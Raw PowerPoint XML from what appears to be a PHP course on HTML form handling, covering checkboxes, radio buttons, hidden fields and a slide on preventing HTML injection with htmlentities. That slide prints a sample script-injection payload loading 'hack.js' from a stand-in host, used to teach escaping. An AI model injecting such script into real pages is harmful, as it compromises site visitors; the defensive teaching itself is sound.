            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2604570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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On the other hand, if you wish to offer a newsletter to your readers when submitting a form, you might want to have the checkbox already checked as the default value:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subscribe? &lt;input type="checkbox" name="news" checked="checked"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you want to allow groups of items to be selected at one time, assign them all the same name. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, only the last item  checked will be submitted, unless you pass an array as the name. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>See next slide…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256403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749509"/>
            <a:ext cx="10515600" cy="5992380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vanilla &lt;input type="checkbox" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name="ice" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value="Vanilla"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chocolate &lt;input type="checkbox" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name="ice" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value="Chocolate"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strawberry &lt;input type="checkbox" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name="ice" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value="Strawberry"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If only one of the checkboxes is selected, such as the second one, only that item will be submitted </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if two or more are selected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>only the last value will be submitted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, with prior values being ignored.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>want </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to allow multiple submissions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vanilla &lt;input type="checkbox" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name="ice[]" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value="Vanilla"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chocolate &lt;input type="checkbox" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name="ice[]" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value="Chocolate"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strawberry &lt;input type="checkbox" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name="ice[]" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value="Strawberry"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202594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524657"/>
            <a:ext cx="10515600" cy="6217232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, you can extract either the single submitted value, or the array of values, to a variable like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ice = $_POST['ice’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the field ice has been posted as a single value, $ice will be a single string, such as "Strawberry". But if ice was defined in the form as an array, $ice will be an array, and its number of elements will be the number of values submitted.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1C20D8-45DF-4F4C-9137-5F513D61C6C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1641422" y="3985252"/>
            <a:ext cx="8909155" cy="2872748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="892750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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Radio buttons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They are used when you want only a single value to be returned from a selection of two or more options. All the buttons in a group must use the same name and, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>because only a single value is returned, you do not have to pass an array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, if your website offers a choice of delivery times for items purchased from your store, you might use HTML like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8am-Noon&lt;input type="radio" name="time" value="1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Noon-4pm&lt;input type="radio" name="time" value="2" checked="checked"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4pm-8pm&lt;input type="radio" name="time" value="3"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3614465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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preventing HTML Injection</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825625"/>
            <a:ext cx="10515600" cy="4815018"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preventing this is as simple as calling the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function. For example, consider this HTML:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='http://x.com/hack.js'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;&lt;script&gt;hack();&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This code loads in a JavaScript program and then executes malicious functions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But if it is first passed through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, it will be turned into the following totally harmless string:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='http://x.com/hack.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;script&amp;gt;hack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224900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779488" y="1683659"/>
            <a:ext cx="10664252" cy="5058229"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here, the second option of “Noon–4pm” has been selected by default. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="−"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Had one of the items not been already checked, the user might forget to select an option, and no value would be submitted at all for the delivery time </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="−"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By default, radio buttons are round</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F2CE58D-6EFE-46D8-867A-A154A96979C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1075952" y="4212773"/>
            <a:ext cx="10071324" cy="1707004"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3274328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fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hidden fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes it is convenient to have hidden form fields so that you can keep track of the state of form entry. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, you might wish to know whether a form has already been submitted. You can achieve this by adding some HTML in your PHP code, such as the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo '&lt;input type="hidden" name="submitted" value="yes"&gt;’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first time the PHP program receives the input, this line of code has not run, so there will be no field named submitted. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PHP program re-creates the form, adding the input field. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So when the visitor resubmits the form, the PHP program receives it with the submitted field set to "yes". The code can simply check whether the field is present:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($_POST['submitted']))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272379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pPr marL="0" indent="0">
              <a:buNone/>
